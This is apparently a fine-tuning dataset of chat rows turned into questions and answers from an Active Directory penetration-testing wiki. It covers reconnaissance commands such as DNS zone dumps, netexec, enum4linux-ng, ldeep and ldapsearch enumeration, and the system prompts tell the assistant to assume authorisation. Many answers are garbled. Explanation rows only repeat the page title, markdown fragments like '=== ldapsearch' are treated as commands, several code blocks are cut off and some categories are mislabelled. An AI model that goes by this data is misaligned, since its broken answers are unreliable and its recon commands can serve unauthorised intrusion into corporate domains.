tools, flags, and syntax.", "user": "Show me how to do DNS - Dump DNS Records in a Domain", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump", "metadata": {"corpus_index": 1261, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump`?"}, {"role": "assistant", "content": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump`?", "response": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain", "metadata": {"corpus_index": 1261, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the netexec command to dns - dump dns records in a domain"}, {"role": "assistant", "content": "netexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the netexec command to dns - dump dns records in a domain", "response": "netexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns", "metadata": {"corpus_index": 1262, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform DNS - Dump DNS Records in a Domain?"}, {"role": "assistant", "content": "netexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform DNS - Dump DNS Records in a Domain?", "response": "netexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns", "metadata": {"corpus_index": 1262, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns`?"}, {"role": "assistant", "content": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns`?", "response": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain", "metadata": {"corpus_index": 1262, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use dig for dns - dump dns records in a domain?"}, {"role": "assistant", "content": "dig axfr @\"$DC_IP\" \"$DOMAIN\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use dig for dns - dump dns records in a domain?", "response": "dig axfr @\"$DC_IP\" \"$DOMAIN\"", "metadata": {"corpus_index": 1263, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dig"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute DNS - Dump DNS Records in a Domain?"}, {"role": "assistant", "content": "dig axfr @\"$DC_IP\" \"$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute DNS - Dump DNS Records in a Domain?", "response": "dig axfr @\"$DC_IP\" \"$DOMAIN\"", "metadata": {"corpus_index": 1263, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dig axfr @\"$DC_IP\" \"$DOMAIN\"`?"}, {"role": "assistant", "content": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dig axfr @\"$DC_IP\" \"$DOMAIN\"`?", "response": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain", "metadata": {"corpus_index": 1263, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of enum4linux ⚙️"}, {"role": "assistant", "content": "The Perl script enum4linux.pl is a powerful tool able to operate recon techniques for LDAP, NBT-NS and MS-RPC. It's an alternative to a similar program named enum.exe (C++) created for Windows systems. Lately, a rewrite of enum4linux in Python has surfaced, called enum4linux-ng. The enum4linux scripts are mainly wrappers around the Samba tools nmblookup, net, rpcclient and smbclient.\n\nThe following techniques can be operated.\n\n* Service & port scan (for LDAP(S), SMB, NetBIOS, MS-RPC)\n* NetBIOS names and workgroup (via reverse lookup)\n* SMB dialects checks (SMBv1 only or SMBv1 and higher)\n* RPC sessions checks (checks if the user creds supplied are valid or if null session works)\n* Domain information via LDAP (find out whether host is a parent or child DC)\n* Domain information via RPC (via SMB named pipe \\pipe\\lsarpc for MS-RPC)\n* OS information via RPC (via SMB named pipe \\pipe\\srvsvc for MS-RPC)\n* Users, groups, shares, policies, printers, services via RPC\n* Users, groups and machines via RID cycling\n* SMB Share names bruteforcing\n\nAll of the techniques mentioned above (except RID cycling) will be operated when running the following command.\n\n``bash\nenum4linux-ng -A \"$TARGET\"\n`\n\nRID cycling can be enabled with the -R` option."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of enum4linux ⚙️", "response": "The Perl script enum4linux.pl is a powerful tool able to operate recon techniques for LDAP, NBT-NS and MS-RPC. It's an alternative to a similar program named enum.exe (C++) created for Windows systems. Lately, a rewrite of enum4linux in Python has surfaced, called enum4linux-ng. The enum4linux scripts are mainly wrappers around the Samba tools nmblookup, net, rpcclient and smbclient.\n\nThe following techniques can be operated.\n\n* Service & port scan (for LDAP(S), SMB, NetBIOS, MS-RPC)\n* NetBIOS names and workgroup (via reverse lookup)\n* SMB dialects checks (SMBv1 only or SMBv1 and higher)\n* RPC sessions checks (checks if the user creds supplied are valid or if null session works)\n* Domain information via LDAP (find out whether host is a parent or child DC)\n* Domain information via RPC (via SMB named pipe \\pipe\\lsarpc for MS-RPC)\n* OS information via RPC (via SMB named pipe \\pipe\\srvsvc for MS-RPC)\n* Users, groups, shares, policies, printers, services via RPC\n* Users, groups and machines via RID cycling\n* SMB Share names bruteforcing\n\nAll of the techniques mentioned above (except RID cycling) will be operated when running the following command.\n\n``bash\nenum4linux-ng -A \"$TARGET\"\n`\n\nRID cycling can be enabled with the -R` option.", "metadata": {"corpus_index": 1264, "category": "web", "source_file": "docs/src/ad/recon/enum4linux.md", "page_title": "enum4linux ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute enum4linux ⚙️?"}, {"role": "assistant", "content": "The Perl script enum4linux.pl is a powerful tool able to operate recon techniques for LDAP, NBT-NS and MS-RPC. It's an alternative to a similar program named enum.exe (C++) created for Windows systems. Lately, a rewrite of enum4linux in Python has surfaced, called enum4linux-ng. The enum4linux scripts are mainly wrappers around the Samba tools nmblookup, net, rpcclient and smbclient.\n\nThe following techniques can be operated.\n\n* Service & port scan (for LDAP(S), SMB, NetBIOS, MS-RPC)\n* NetBIOS names and workgroup (via reverse lookup)\n* SMB dialects checks (SMBv1 only or SMBv1 and higher)\n* RPC sessions checks (checks if the user creds supplied are valid or if null session works)\n* Domain information via LDAP (find out whether host is a parent or child DC)\n* Domain information via RPC (via SMB named pipe \\pipe\\lsarpc for MS-RPC)\n* OS information via RPC (via SMB named pipe \\pipe\\srvsvc for MS-RPC)\n* Users, groups, shares, policies, printers, services via RPC\n* Users, groups and machines via RID cycling\n* SMB Share names bruteforcing\n\nAll of the techniques mentioned above (except RID cycling) will be operated when running the following command.\n\n``bash\nenum4linux-ng -A \"$TARGET\"\n`\n\nRID cycling can be enabled with the -R` option."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute enum4linux ⚙️?", "response": "The Perl script enum4linux.pl is a powerful tool able to operate recon techniques for LDAP, NBT-NS and MS-RPC. It's an alternative to a similar program named enum.exe (C++) created for Windows systems. Lately, a rewrite of enum4linux in Python has surfaced, called enum4linux-ng. The enum4linux scripts are mainly wrappers around the Samba tools nmblookup, net, rpcclient and smbclient.\n\nThe following techniques can be operated.\n\n* Service & port scan (for LDAP(S), SMB, NetBIOS, MS-RPC)\n* NetBIOS names and workgroup (via reverse lookup)\n* SMB dialects checks (SMBv1 only or SMBv1 and higher)\n* RPC sessions checks (checks if the user creds supplied are valid or if null session works)\n* Domain information via LDAP (find out whether host is a parent or child DC)\n* Domain information via RPC (via SMB named pipe \\pipe\\lsarpc for MS-RPC)\n* OS information via RPC (via SMB named pipe \\pipe\\srvsvc for MS-RPC)\n* Users, groups, shares, policies, printers, services via RPC\n* Users, groups and machines via RID cycling\n* SMB Share names bruteforcing\n\nAll of the techniques mentioned above (except RID cycling) will be operated when running the following command.\n\n``bash\nenum4linux-ng -A \"$TARGET\"\n`\n\nRID cycling can be enabled with the -R` option.", "metadata": {"corpus_index": 1264, "category": "web", "source_file": "docs/src/ad/recon/enum4linux.md", "page_title": "enum4linux ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the enum4linux-ng command to enum4linux ⚙️"}, {"role": "assistant", "content": "enum4linux-ng -A \"$TARGET\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the enum4linux-ng command to enum4linux ⚙️", "response": "enum4linux-ng -A \"$TARGET\"", "metadata": {"corpus_index": 1265, "category": "web", "source_file": "docs/src/ad/recon/enum4linux.md", "page_title": "enum4linux ⚙️", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "enum4linux-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute enum4linux ⚙️?"}, {"role": "assistant", "content": "enum4linux-ng -A \"$TARGET\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute enum4linux ⚙️?", "response": "enum4linux-ng -A \"$TARGET\"", "metadata": {"corpus_index": 1265, "category": "web", "source_file": "docs/src/ad/recon/enum4linux.md", "page_title": "enum4linux ⚙️", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `enum4linux-ng -A \"$TARGET\"`?"}, {"role": "assistant", "content": "This command is used for enum4linux ⚙️. enum4linux ⚙️"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `enum4linux-ng -A \"$TARGET\"`?", "response": "This command is used for enum4linux ⚙️. enum4linux ⚙️", "metadata": {"corpus_index": 1265, "category": "web", "source_file": "docs/src/ad/recon/enum4linux.md", "page_title": "enum4linux ⚙️", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Reconnaissance"}, {"role": "assistant", "content": "When attacking an Active Directory, or in fact any system, it is essential to gather useful information that will help define who, what, when and where. Here are some examples of what information to look for.\n\n* The location of the domain controllers (and other major AD services like KDC, DNS and so on). This can be achieved by resolving standard names, by scanning the network and with standard LDAP queries\n* The domain name. It can be found with standard LDAP queries, recon through MS-RPC named pipes, by combining different recon techniques with enum4linux, by inspecting multicast and broadcast name resolution queries, ...\n* Domain objects and relations between them with BloodHound, with MS-RPC named pipes and with enum4linux."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Reconnaissance", "response": "When attacking an Active Directory, or in fact any system, it is essential to gather useful information that will help define who, what, when and where. Here are some examples of what information to look for.\n\n* The location of the domain controllers (and other major AD services like KDC, DNS and so on). This can be achieved by resolving standard names, by scanning the network and with standard LDAP queries\n* The domain name. It can be found with standard LDAP queries, recon through MS-RPC named pipes, by combining different recon techniques with enum4linux, by inspecting multicast and broadcast name resolution queries, ...\n* Domain objects and relations between them with BloodHound, with MS-RPC named pipes and with enum4linux.", "metadata": {"corpus_index": 1266, "category": "active_directory", "source_file": "docs/src/ad/recon/index.md", "page_title": "Reconnaissance", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Reconnaissance"}, {"role": "assistant", "content": "When attacking an Active Directory, or in fact any system, it is essential to gather useful information that will help define who, what, when and where. Here are some examples of what information to look for.\n\n* The location of the domain controllers (and other major AD services like KDC, DNS and so on). This can be achieved by resolving standard names, by scanning the network and with standard LDAP queries\n* The domain name. It can be found with standard LDAP queries, recon through MS-RPC named pipes, by combining different recon techniques with enum4linux, by inspecting multicast and broadcast name resolution queries, ...\n* Domain objects and relations between them with BloodHound, with MS-RPC named pipes and with enum4linux."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Reconnaissance", "response": "When attacking an Active Directory, or in fact any system, it is essential to gather useful information that will help define who, what, when and where. Here are some examples of what information to look for.\n\n* The location of the domain controllers (and other major AD services like KDC, DNS and so on). This can be achieved by resolving standard names, by scanning the network and with standard LDAP queries\n* The domain name. It can be found with standard LDAP queries, recon through MS-RPC named pipes, by combining different recon techniques with enum4linux, by inspecting multicast and broadcast name resolution queries, ...\n* Domain objects and relations between them with BloodHound, with MS-RPC named pipes and with enum4linux.", "metadata": {"corpus_index": 1266, "category": "active_directory", "source_file": "docs/src/ad/recon/index.md", "page_title": "Reconnaissance", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does LDAP work?"}, {"role": "assistant", "content": "A lot of information on an AD domain can be obtained through LDAP. Most of the information can only be obtained with an authenticated bind but metadata (naming contexts, DNS server name, Domain Functional Level (DFL)) can be obtainable anonymously, even with anonymous binding disabled.\n\n::: tabs\n\n=== ldeep\n\nThe ldeep (Python) tool can be used to enumerate essential information like delegations, gpo, groups, machines, pso, trusts, users, and so on.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does LDAP work?", "response": "A lot of information on an AD domain can be obtained through LDAP. Most of the information can only be obtained with an authenticated bind but metadata (naming contexts, DNS server name, Domain Functional Level (DFL)) can be obtainable anonymously, even with anonymous binding disabled.\n\n::: tabs\n\n=== ldeep\n\nThe ldeep (Python) tool can be used to enumerate essential information like delegations, gpo, groups, machines, pso, trusts, users, and so on.\n\n```bash", "metadata": {"corpus_index": 1267, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform LDAP?"}, {"role": "assistant", "content": "A lot of information on an AD domain can be obtained through LDAP. Most of the information can only be obtained with an authenticated bind but metadata (naming contexts, DNS server name, Domain Functional Level (DFL)) can be obtainable anonymously, even with anonymous binding disabled.\n\n::: tabs\n\n=== ldeep\n\nThe ldeep (Python) tool can be used to enumerate essential information like delegations, gpo, groups, machines, pso, trusts, users, and so on.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform LDAP?", "response": "A lot of information on an AD domain can be obtained through LDAP. Most of the information can only be obtained with an authenticated bind but metadata (naming contexts, DNS server name, Domain Functional Level (DFL)) can be obtainable anonymously, even with anonymous binding disabled.\n\n::: tabs\n\n=== ldeep\n\nThe ldeep (Python) tool can be used to enumerate essential information like delegations, gpo, groups, machines, pso, trusts, users, and so on.\n\n```bash", "metadata": {"corpus_index": 1267, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain remotely dump information"}, {"role": "assistant", "content": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" all \"ldeepdump/$DOMAIN\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain remotely dump information", "response": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" all \"ldeepdump/$DOMAIN\"", "metadata": {"corpus_index": 1268, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute remotely dump information?"}, {"role": "assistant", "content": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" all \"ldeepdump/$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute remotely dump information?", "response": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" all \"ldeepdump/$DOMAIN\"", "metadata": {"corpus_index": 1268, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe parse saved information (in this case, enumerate trusts) in the context of penetration testing"}, {"role": "assistant", "content": "ldeep cache -d \"ldeepdump\" -p \"$DOMAIN\" trusts\n``\n\n=== ldapsearch\n\nThe ldapsearch (C) tool can also be used.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe parse saved information (in this case, enumerate trusts) in the context of penetration testing", "response": "ldeep cache -d \"ldeepdump\" -p \"$DOMAIN\" trusts\n``\n\n=== ldapsearch\n\nThe ldapsearch (C) tool can also be used.\n\n``bash", "metadata": {"corpus_index": 1269, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through parse saved information (in this case, enumerate trusts)"}, {"role": "assistant", "content": "ldeep cache -d \"ldeepdump\" -p \"$DOMAIN\" trusts\n``\n\n=== ldapsearch\n\nThe ldapsearch (C) tool can also be used.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through parse saved information (in this case, enumerate trusts)", "response": "ldeep cache -d \"ldeepdump\" -p \"$DOMAIN\" trusts\n``\n\n=== ldapsearch\n\nThe ldapsearch (C) tool can also be used.\n\n``bash", "metadata": {"corpus_index": 1269, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out parse saved information (in this case, enumerate trusts) during a pentest?"}, {"role": "assistant", "content": "=== ldapsearch\n\nThe [ldapsearch](https://git.openldap.org/openldap/openldap) (C) tool can also be used."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out parse saved information (in this case, enumerate trusts) during a pentest?", "response": "=== ldapsearch\n\nThe [ldapsearch](https://git.openldap.org/openldap/openldap) (C) tool can also be used.", "metadata": {"corpus_index": 1270, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== ldapsearch`?"}, {"role": "assistant", "content": "This command is used for parse saved information (in this case, enumerate trusts). parse saved information (in this case, enumerate trusts)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== ldapsearch`?", "response": "This command is used for parse saved information (in this case, enumerate trusts). parse saved information (in this case, enumerate trusts)", "metadata": {"corpus_index": 1270, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain list naming contexts"}, {"role": "assistant", "content": "ldapsearch -h \"$DC_IP\" -x -s base namingcontexts\nldapsearch -H \"ldap://$DC_IP\" -x -s base namingcontexts"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain list naming contexts", "response": "ldapsearch -h \"$DC_IP\" -x -s base namingcontexts\nldapsearch -H \"ldap://$DC_IP\" -x -s base namingcontexts", "metadata": {"corpus_index": 1271, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute list naming contexts?"}, {"role": "assistant", "content": "ldapsearch -h \"$DC_IP\" -x -s base namingcontexts\nldapsearch -H \"ldap://$DC_IP\" -x -s base namingcontexts"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute list naming contexts?", "response": "ldapsearch -h \"$DC_IP\" -x -s base namingcontexts\nldapsearch -H \"ldap://$DC_IP\" -x -s base namingcontexts", "metadata": {"corpus_index": 1271, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)"}, {"role": "assistant", "content": "ldapsearch -h \"$DC_IP\" -x -b \"DC=DOMAIN,DC=LOCAL\"\nldapsearch -H \"ldap://$TARGET\" -x -b \"DC=DOMAIN,DC=LOCAL\"\n``\n\n=== ldapsearch-ad\n\nThe ldapsearch-ad Python script can also be used to enumerate essential information like domain admins that have their password set to never expire, default password policies and the ones found in GPOs, trusts, kerberoastable accounts, and so on.\\\n\n`bash\nldapsearch-ad --type all --server \"$DC_IP\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\nThe FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\\n\n`bash\nldapsearch-ad --type info --server \"$DC_IP\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\n=== windapsearch\n\nThe windapsearch script (Go (preferred) or Python) can be used to enumerate basic but useful information.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)", "response": "ldapsearch -h \"$DC_IP\" -x -b \"DC=DOMAIN,DC=LOCAL\"\nldapsearch -H \"ldap://$TARGET\" -x -b \"DC=DOMAIN,DC=LOCAL\"\n``\n\n=== ldapsearch-ad\n\nThe ldapsearch-ad Python script can also be used to enumerate essential information like domain admins that have their password set to never expire, default password policies and the ones found in GPOs, trusts, kerberoastable accounts, and so on.\\\n\n`bash\nldapsearch-ad --type all --server \"$DC_IP\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\nThe FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\\n\n`bash\nldapsearch-ad --type info --server \"$DC_IP\" --domain 